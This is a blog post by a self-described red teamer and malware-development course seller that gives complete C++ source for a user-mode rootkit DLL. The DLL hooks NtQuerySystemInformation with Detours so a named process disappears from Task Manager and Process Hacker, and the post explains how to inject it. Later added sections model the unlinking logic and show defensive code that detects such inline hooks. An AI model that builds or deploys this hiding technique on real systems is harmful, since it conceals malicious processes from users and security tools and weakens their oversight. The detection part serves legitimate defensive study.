Hide Processes in Task Manager

S12 - H4CK
5 min read · Dec 21, 2023


Welcome to my new article. Today I will show you how I built a basic DLL that implements a user-mode rootkit technique to hide a process from Task Manager, Process Hacker, and any other process list that is built on the NtQuerySystemInformation function.

Introduction

And if you want to learn the basics of Windows malware development, my Introduction course is available from $15. Until the end of 2023 you get a $5 discount with the “christmas” code.

*Send an email for crypto payments: s12deff@gmail.com *

This article looks at process concealment on Windows. As a red teamer and ethical malware developer working in C++, I walk through building a small DLL that applies a user-mode rootkit technique: injected into a target process, it hooks NtQuerySystemInformation (declared in winternl.h) and filters the process list that function returns, so Task Manager, Process Hacker, and any other tool that enumerates processes through that call no longer shows the chosen process. Along the way we look at how the function hands process information back to Win32 applications, because the hook works by editing exactly that data.

Code

#include "pch.h"        // with MSVC precompiled headers (/Yu) this include must come first
#include <Windows.h>
#include <winternl.h>
#include <wchar.h>
#include "detours.h"

#define HIDE_PROCNAME L"notepad.exe"

typedef NTSTATUS(NTAPI* NtQuerySystemInformation_t)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

// After DetourAttach this points at the trampoline that reaches the original code.
NtQuerySystemInformation_t origNtQuerySystemInformation = NULL;

// Exact, case-insensitive match on the UNICODE_STRING (Length is in bytes and the
// buffer need not be NUL-terminated), so "mynotepad.exe" is not hidden by accident.
static BOOL IsHiddenName(const UNICODE_STRING* name) {
    size_t chars = wcslen(HIDE_PROCNAME);
    if (name->Buffer == NULL || name->Length != chars * sizeof(WCHAR)) {
        return FALSE;
    }
    return _wcsnicmp(name->Buffer, HIDE_PROCNAME, chars) == 0;
}

NTSTATUS NTAPI HookedNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) {
    NTSTATUS status = origNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);

    // Only walk the buffer when the call succeeded: callers usually probe first with a
    // small buffer and get STATUS_INFO_LENGTH_MISMATCH, in which case nothing is filled in.
    if (NT_SUCCESS(status) && SystemInformationClass == SystemProcessInformation) {
        PSYSTEM_PROCESS_INFORMATION pPrevious = NULL;
        PSYSTEM_PROCESS_INFORMATION pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;

        while (pCurrent != NULL) {
            PSYSTEM_PROCESS_INFORMATION pNext = (pCurrent->NextEntryOffset != 0)
                ? (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->NextEntryOffset)
                : NULL;

            // The first record is the Idle process (PID 0, empty name), so a match never
            // happens while pPrevious is NULL; a head record could not be unlinked anyway.
            if (pPrevious != NULL && IsHiddenName(&pCurrent->ImageName)) {
                // Unlink pCurrent: make the previous record jump over it. Offsets are
                // relative, so they add, but 0 means "last record" and has to be
                // propagated rather than added, otherwise a hidden last process stays visible.
                pPrevious->NextEntryOffset = (pNext != NULL)
                    ? pPrevious->NextEntryOffset + pCurrent->NextEntryOffset
                    : 0;
                // pPrevious deliberately stays put: the next record may be another
                // instance of the same image and must be unlinked from the same predecessor.
            } else {
                pPrevious = pCurrent;
            }
            pCurrent = pNext;
        }
    }
    return status;
}


BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        origNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");
        if (origNtQuerySystemInformation == NULL) {
            return FALSE;   // refuse to load rather than detour a NULL pointer
        }
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourAttach(&(PVOID&)origNtQuerySystemInformation, HookedNtQuerySystemInformation);
        if (DetourTransactionCommit() != NO_ERROR) {
            return FALSE;
        }
        break;

    case DLL_PROCESS_DETACH:
        // lpReserved is non-NULL when the process is exiting; patching ntdll back at that
        // point is pointless and risky, so only unhook on an explicit FreeLibrary.
        if (lpReserved == NULL && origNtQuerySystemInformation != NULL) {
            DetourTransactionBegin();
            DetourUpdateThread(GetCurrentThread());
            DetourDetach(&(PVOID&)origNtQuerySystemInformation, HookedNtQuerySystemInformation);
            DetourTransactionCommit();
        }
        break;

    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}

This code is a DLL (Dynamic Link Library) that hooks NtQuerySystemInformation, a native API exported by ntdll.dll that returns various kinds of system information. Its goal is to hide one process, here “notepad.exe”, from the list of running processes a caller gets back when it asks for the SystemProcessInformation class.

Here’s a breakdown of the key components:

  1. NtQuerySystemInformation_t typedef:
  • Defines a function pointer type matching the signature of NtQuerySystemInformation, so the original can be called through the trampoline that Detours hands back.
  2. Global definitions:
  • HIDE_PROCNAME: the image name ("notepad.exe") of the process to hide.
  • origNtQuerySystemInformation: the pointer through which the original function is reached once the hook is installed.
  3. HookedNtQuerySystemInformation function:
  • The replacement for NtQuerySystemInformation.
  • It calls the original first, then walks the buffer the original filled in. For SystemProcessInformation that buffer is a chain of SYSTEM_PROCESS_INFORMATION records, each holding in NextEntryOffset the byte distance to the next record; 0 marks the last one.
  • When a record's image name matches HIDE_PROCNAME, it unlinks that record by pointing the previous record's NextEntryOffset past it. The caller walks the same chain and simply never reaches the hidden record.
  4. DllMain function:
  • Entry point for the DLL.
  • During DLL_PROCESS_ATTACH, it resolves the address of NtQuerySystemInformation in ntdll.dll and attaches the hook (replacement function).
  • During DLL_PROCESS_DETACH, it detaches the hook.
  5. DetourTransactionBegin/UpdateThread/Attach/Commit:
  • These functions belong to the Detours library, which does the function hooking.
  • DetourTransactionBegin and DetourTransactionCommit mark the beginning and end of a hooking transaction; nothing is patched until the commit.
  • DetourUpdateThread enrols a thread in the transaction so its instruction pointer can be fixed up if it happens to sit inside the bytes being patched.
  • DetourAttach and DetourDetach install and remove the hook; on attach, the pointer passed in is rewritten to point at a trampoline that reaches the original code.

In summary, this code serves as a basic example of a user-mode rootkit technique, where it intercepts calls to NtQuerySystemInformation to manipulate the list of running processes and hide a specified process from being detected.
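To make the unlinking concrete, here is an added example that is not part of the original post: a small, portable C++ model of the NextEntryOffset-chained buffer NtQuerySystemInformation returns for SystemProcessInformation, with the filter written to handle the cases a naive unlink gets wrong (a hidden process in the last record, two hidden records in a row, and a match at the head of the chain). ProcEntry, Proc, BuildBuffer, HideByName, VisibleNames and RunHide are names chosen for the example; ProcEntry stands in for SYSTEM_PROCESS_INFORMATION with only the fields the hook touches, and the process list it runs on is constructed. It uses no Windows headers, so it builds and runs on any platform.

```cpp
// Added example: portable model of the SystemProcessInformation chain and a
// robust unlink over it. Not the original post's code.
#include <cstdint>
#include <cstring>
#include <cwchar>
#include <string>
#include <vector>

// Stand-in for SYSTEM_PROCESS_INFORMATION: only the fields the hook touches.
struct ProcEntry {
    uint32_t NextEntryOffset;   // bytes to the next record, 0 = last record
    uint32_t Pid;
    wchar_t  ImageName[32];     // the real struct holds a UNICODE_STRING
};

struct Proc { uint32_t pid; std::wstring name; };   // constructed input rows

// Lays records out back to back the way the kernel does. Real records are variable
// length (a thread array follows each header), so alternate records get 16 bytes of
// padding to make sure the walk relies on NextEntryOffset, not on sizeof(ProcEntry).
std::vector<uint8_t> BuildBuffer(const std::vector<Proc>& procs) {
    std::vector<uint8_t> buf;
    for (size_t i = 0; i < procs.size(); ++i) {
        size_t recSize = sizeof(ProcEntry) + (i % 2) * 16;
        ProcEntry e{};
        e.NextEntryOffset = (i + 1 < procs.size()) ? static_cast<uint32_t>(recSize) : 0;
        e.Pid = procs[i].pid;
        wcsncpy(e.ImageName, procs[i].name.c_str(), 31);
        size_t at = buf.size();
        buf.resize(at + recSize);
        memcpy(buf.data() + at, &e, sizeof e);
    }
    return buf;
}

// Removes every record whose name equals `hide`. Returns the number of bytes still
// in use; it only shrinks when the head record has to be slid out of the way.
size_t HideByName(uint8_t* buf, size_t used, const wchar_t* hide) {
    ProcEntry* prev = nullptr;
    ProcEntry* cur  = used ? reinterpret_cast<ProcEntry*>(buf) : nullptr;
    while (cur) {
        ProcEntry* next = cur->NextEntryOffset
            ? reinterpret_cast<ProcEntry*>(reinterpret_cast<uint8_t*>(cur) + cur->NextEntryOffset)
            : nullptr;
        if (wcscmp(cur->ImageName, hide) != 0) {
            prev = cur;
            cur = next;
            continue;
        }
        if (prev == nullptr) {
            // Head record: nothing points at it, so move the rest of the buffer down
            // over it. Offsets are relative to each record, so the chain stays intact.
            if (next == nullptr) return 0;   // it was the only record
            size_t tail = used - static_cast<size_t>(reinterpret_cast<uint8_t*>(next) - buf);
            memmove(buf, next, tail);
            used = tail;
            cur = reinterpret_cast<ProcEntry*>(buf);   // re-check the new head
            continue;
        }
        // Middle or last record: make prev jump over cur. Offsets add up, except that
        // 0 means "last record" and must be propagated rather than added.
        prev->NextEntryOffset = next ? prev->NextEntryOffset + cur->NextEntryOffset : 0;
        cur = next;   // prev stays where it is: next may be another match
    }
    return used;
}

// Walks the (possibly edited) chain and returns the names a caller would see.
std::vector<std::wstring> VisibleNames(const uint8_t* buf, size_t used) {
    std::vector<std::wstring> out;
    const ProcEntry* cur = used ? reinterpret_cast<const ProcEntry*>(buf) : nullptr;
    while (cur) {
        out.push_back(cur->ImageName);
        cur = cur->NextEntryOffset
            ? reinterpret_cast<const ProcEntry*>(reinterpret_cast<const uint8_t*>(cur) + cur->NextEntryOffset)
            : nullptr;
    }
    return out;
}

// Convenience wrapper: build the buffer, filter it, list what is left.
std::vector<std::wstring> RunHide(const std::vector<Proc>& procs, const wchar_t* hide) {
    std::vector<uint8_t> buf = BuildBuffer(procs);
    size_t used = HideByName(buf.data(), buf.size(), hide);
    return VisibleNames(buf.data(), used);
}

int main() {
    // Constructed list: PID 0 with an empty name models the Idle process that always
    // heads the real list; three notepad.exe rows cover the consecutive and last cases.
    std::vector<std::wstring> seen = RunHide(
        {{0, L""}, {4, L"System"}, {1234, L"notepad.exe"}, {1235, L"notepad.exe"},
         {2000, L"explorer.exe"}, {3000, L"notepad.exe"}}, L"notepad.exe");
    for (const std::wstring& n : seen) wprintf(L"%ls\n", n.c_str());
    return seen.size() == 3 ? 0 : 1;
}
```

In the real hook the head record is always the Idle process (PID 0, empty name), so the memmove path never fires there; it is included because a chain walker that cannot cope with a match at the head is a latent crash. Leaving `prev` in place after an unlink is what lets two consecutive notepad.exe instances both disappear, and propagating the zero offset is what keeps a notepad.exe that happens to be last from staying visible.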

Proof of Concept

Let’s inject into Task Manager and check whether it works!

First we open Task Manager, a Notepad window and, last, Process Hacker 2 running with admin privileges.

Why admin privileges?

Task Manager runs elevated, so a non-elevated process cannot open it with the access rights that injection needs. The injector has to run as Administrator, or as NT AUTHORITY\SYSTEM (which sits above Administrator).

Done! What’s next?

The next step is to inject the DLL with Process Hacker 2 and check whether it works.

Process Hacker’s Inject DLL option (right-click the target process, then Miscellaneous > Inject DLL) makes this easy. You could also write your own injector, but for a proof of concept this is simpler.

After the injection, notepad.exe no longer appears in Task Manager even though it is still running:

Process Hacker, which has not been injected, still shows it:

If we inject into Process Hacker 2 as well, it disappears there too:

Conclusions

In conclusion, this article walked through process concealment on Windows with a practical user-mode rootkit technique packaged as a basic DLL. By intercepting calls to NtQuerySystemInformation, the code hid a chosen process, “notepad.exe”, from common process monitors such as Task Manager and Process Hacker.

The code used function hooking with the Detours library to edit the list of running processes in place, and the Proof of Concept section showed the targeted process vanishing from both Task Manager and Process Hacker once the DLL had been injected into each of them.

Two limits are worth keeping in mind. The hook only exists inside the processes it is injected into: as the PoC itself showed, Process Hacker kept listing notepad.exe until it was injected too, and the same holds for any other enumerator, a fresh PowerShell running Get-Process, a kernel driver, or an EDR watching process-creation callbacks. And because the hook patches the first bytes of NtQuerySystemInformation in the process’s copy of ntdll.dll, a scanner that compares those bytes with the on-disk image, or simply checks whether the export still starts with a syscall stub rather than a jump, will flag it.
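As an added example that is not part of the original post, here is the detection side of the technique: a C++ classifier for the first bytes of an x64 ntdll export, which tells a clean syscall stub (mov r10, rcx; mov eax, N) apart from the jmp that an inline hook such as Detours writes there, plus a byte-for-byte comparison against the unhooked copy. PrologueVerdict, ClassifyPrologue, FirstDifference, kCleanStub and kDetouredStub are names chosen for the example, and both byte strings are constructed (the syscall number 0x36 is a placeholder, not a claim about any Windows build). It runs anywhere; on Windows the two vectors would be filled from the 16 bytes at GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation") and from the same RVA in a fresh file mapping of System32\ntdll.dll.

```cpp
// Added example: classify an ntdll export prologue and diff it against a clean
// copy to spot a user-mode inline hook. Not the original post's code.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

struct PrologueVerdict {
    bool        hooked;         // true unless the bytes are a recognisable syscall stub
    std::string kind;           // "syscall", "jmp_rel32", "jmp_indirect" or "unknown"
    uint32_t    syscallNumber;  // meaningful when kind == "syscall"
    int32_t     displacement;   // meaningful when kind starts with "jmp"
};

static uint32_t ReadLE32(const std::vector<uint8_t>& b, size_t at) {
    return static_cast<uint32_t>(b[at]) |
           (static_cast<uint32_t>(b[at + 1]) << 8) |
           (static_cast<uint32_t>(b[at + 2]) << 16) |
           (static_cast<uint32_t>(b[at + 3]) << 24);
}

// Decodes the start of an x64 Nt* export.
//   clean stub  : 4C 8B D1         mov r10, rcx
//                 B8 nn nn nn nn   mov eax, <syscall number>
//   inline hook : E9 rel32         jmp <trampoline>
//                 FF 25 rel32      jmp qword ptr [rip+rel32]
// Anything else is reported as hooked: a scanner should err on the side of noise.
PrologueVerdict ClassifyPrologue(const std::vector<uint8_t>& p) {
    PrologueVerdict v{true, "unknown", 0, 0};
    if (p.size() >= 8 && p[0] == 0x4C && p[1] == 0x8B && p[2] == 0xD1 && p[3] == 0xB8) {
        v.hooked = false;
        v.kind = "syscall";
        v.syscallNumber = ReadLE32(p, 4);
    } else if (p.size() >= 5 && p[0] == 0xE9) {
        v.kind = "jmp_rel32";
        v.displacement = static_cast<int32_t>(ReadLE32(p, 1));
    } else if (p.size() >= 6 && p[0] == 0xFF && p[1] == 0x25) {
        v.kind = "jmp_indirect";
        v.displacement = static_cast<int32_t>(ReadLE32(p, 2));
    }
    return v;
}

// Offset of the first byte that differs between the in-memory prologue and the
// on-disk one within the first n bytes, or -1 when they agree.
long FirstDifference(const std::vector<uint8_t>& mem, const std::vector<uint8_t>& disk, size_t n) {
    for (size_t i = 0; i < n && i < mem.size() && i < disk.size(); ++i) {
        if (mem[i] != disk[i]) return static_cast<long>(i);
    }
    return -1;
}

// Constructed samples (not dumped from a real system). 0x36 is a placeholder syscall
// number; the real one differs between Windows builds. The bytes that follow a
// patched jmp depend on the hook engine; 0xCC filler is used here.
const std::vector<uint8_t> kCleanStub = {
    0x4C, 0x8B, 0xD1, 0xB8, 0x36, 0x00, 0x00, 0x00,
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01};
const std::vector<uint8_t> kDetouredStub = {
    0xE9, 0x78, 0x56, 0x34, 0x12, 0xCC, 0xCC, 0xCC,
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01};

int main() {
    PrologueVerdict clean = ClassifyPrologue(kCleanStub);
    PrologueVerdict hooked = ClassifyPrologue(kDetouredStub);
    std::printf("clean : kind=%s syscall=0x%x\n", clean.kind.c_str(), clean.syscallNumber);
    std::printf("hooked: kind=%s disp=0x%x first_diff=%ld\n", hooked.kind.c_str(),
                static_cast<unsigned>(hooked.displacement),
                FirstDifference(kDetouredStub, kCleanStub, 16));
    return (hooked.hooked && !clean.hooked) ? 0 : 1;
}
```

The FirstDifference offset tells you where in the prologue the patch starts (0 for a Detours-style hook, which overwrites the very first instruction), and the decoded displacement points at the trampoline or hook function, which is the next thing to inspect in a live investigation.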


If you enjoy my content and would like to help me take this project to the next level, you can become a member with a monthly subscription. Your support will help me continue to create high-quality content. Thank you for your generosity!

If donating is not possible for you at this time, no problem at all! Your support in sharing my project and spreading the word is greatly appreciated. I will continue to create and share my work regardless, and I am grateful for your encouragement and interest.

Thanks for reading this :)

S12.
